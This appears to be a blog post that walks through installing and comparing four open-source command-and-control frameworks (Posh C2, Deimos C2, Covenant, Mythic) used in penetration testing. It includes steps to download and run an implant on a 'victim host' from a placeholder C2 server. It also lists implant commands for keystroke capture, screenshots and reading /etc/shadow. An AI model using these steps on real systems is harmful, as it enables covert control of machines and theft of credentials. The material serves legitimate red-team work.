C2 frameworks are post-exploitation tools used by pentesters and threat actors to manage compromised hosts from a centralised location.

In this post I will walk through the following popular open-source C2 frameworks and then compare them.

  • Posh C2
  • Deimos C2
  • Covenant
  • Mythic

Minimum requirements for the C2 server:

  • 1 vCPU
  • 1 GB of RAM
  • 15 GB of storage

POSH C2

Posh C2 is maintained by Nettitude, a cyber security consultancy [Link]. It allows teams to collaborate on a single server instance and keeps all activity (commands and outputs) logged with timestamps. Traffic is encrypted even over HTTP.

INSTALLATION

Quick installation on Kali:

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash

Or from the Kali repository:

sudo apt install poshc2 -y

Quick installation on Docker:

sudo apt update && sudo apt install docker.io -y
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | sudo bash

SERVER SETUP

Create a project at /var/poshc2/dft-c2/payloads/:

posh-project -n dft-c2

Open the configuration file:

posh-config

Set the IP or hostname of the C2:

PayloadCommsHost: "https://c2.example.com"

Start the server manually:

posh-server

Start or stop the server as a service:

posh-service
posh-stop-service

Note: compiled implants are placed at /var/poshc2/dft-c2/payloads, where dft-c2 is the project name used in this example. You can review the quick start information at any time by running cat /var/poshc2/dft-c2/quickstart.txt.

HANDLING CONNECTIONS

Start the ImplantHandler:

posh -u userName

At this point an implant must be executed on the victim host. Press Enter to refresh until it appears.

After selecting the number of the connected implant, try the following commands:

  • listmodules
  • get-computerinfo
  • get-ipconfig
  • get-userinfo
  • find-allvulns
  • invoke-arpscan
  • get-screenshot
  • get-keystrokes
    • Get-KeystrokeData

DEIMOS C2

Deimos C2 is written in Go. All communications are encrypted with a unique RSA key pair per listener. It includes a multi-user Web UI with graphical maps for interacting with listeners and agents [Link].

INSTALLATION

https://github.com/DeimosC2/DeimosC2/releases/download/1.1.0/DeimosC2_linux.zip
sudo apt install unzip -y 
unzip DeimosC2_linux.zip
chmod +x ./DeimosC2 && ./DeimosC2

SETUP

Navigate to the server’s public IP or hostname (e.g. https://c2.example.com:8443/).

Go to LISTENERS > Add Listener.

Selected agents will be compiled automatically but can also be generated on demand.

 

Agent binaries are located at the following path, inside a directory named after the listener’s key (UUID format):

cd ~/resources/listenerresources/3c1076cd-cc30-4b4e-960f-4498ceb72c82
python3 -m http.server 8080

Download and execute the agent binary on the victim host:

wget http://c2.example.com:8080/HTTPSAgent_Lin_amd64_Intel
chmod +x HTTPSAgent_Lin_amd64_Intel
./HTTPSAgent_Lin_amd64_Intel

It will take a few seconds to establish a connection.

Try the following commands:

  • shell whoami
  • shell cat /etc/shadow
  • module shadowdump

COVENANT

Covenant is another collaborative C2 framework focused on highlighting the attack surface of .NET [Link].

INSTALLATION

The Docker version is recommended to avoid having to install the .NET Core 3.1 SDK manually.

git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
sudo apt install docker.io -y
sudo docker build -t covenant .
sudo docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -d -v /FULL_PATH/Covenant/Covenant/Data:/app/Data covenant

Note: the FULL_PATH must point to the directory where the configuration is located.

SETUP

Navigate to https://c2.example.com:7443/ (replace the hostname accordingly).

Go to Listeners > +Create.

MANAGING THE CONTAINER

docker start covenant
docker stop covenant
docker rm covenant

MYTHIC

Mythic is a cross-platform framework written in Go that runs in containers and can be managed via a Web UI and CLI [Link].

It requires more than 2 vCPUs and 1 GB of RAM to run smoothly.

INSTALLATION

sudo apt update && sudo apt upgrade -y
sudo apt install docker.io gcc build-essential docker-compose docker-compose-plugin -y
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
sudo make
./install_docker_ubuntu.sh
cd Mythic
sudo ./mythic-cli start
cat Mythic/.env | grep MYTHIC_ADMIN_PASSWORD

Navigate to https://c2.example.com:7443/ (replace the hostname accordingly).

Log in with the default username mythic_admin and the randomly generated password found in Mythic/.env.

It includes a built-in reference library based on MITRE ATT&CK:

EXTENSIONS

You can extend the framework by installing additional agents and profiles:

sudo ./mythic-cli install github https://github.com/MythicAgents/athena
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/basic_logger

REFLECTIONS AND OBSERVATIONS

  • Posh C2
    • Not particularly sophisticated,
    • Has issues with Python libraries and dependencies,
    • Available in Kali’s repository,
    • Heavily focused on Windows.
  • Deimos C2
    • Clean Web UI but unstable,
    • The terminal feature is slow due to the agent polling the server periodically for commands,
    • Easy to deploy with pre-compiled server and agent binaries.
  • Covenant
    • Polished Web UI,
    • The terminology around Launchers and Grunts can be confusing,
    • Exclusively focused on .NET.
  • Mythic
    • The most resource-intensive but also the most feature-rich of the four,
    • A wide variety of extensions and add-ons available,
    • Having MITRE ATT&CK [Link] references a single click away is a great touch.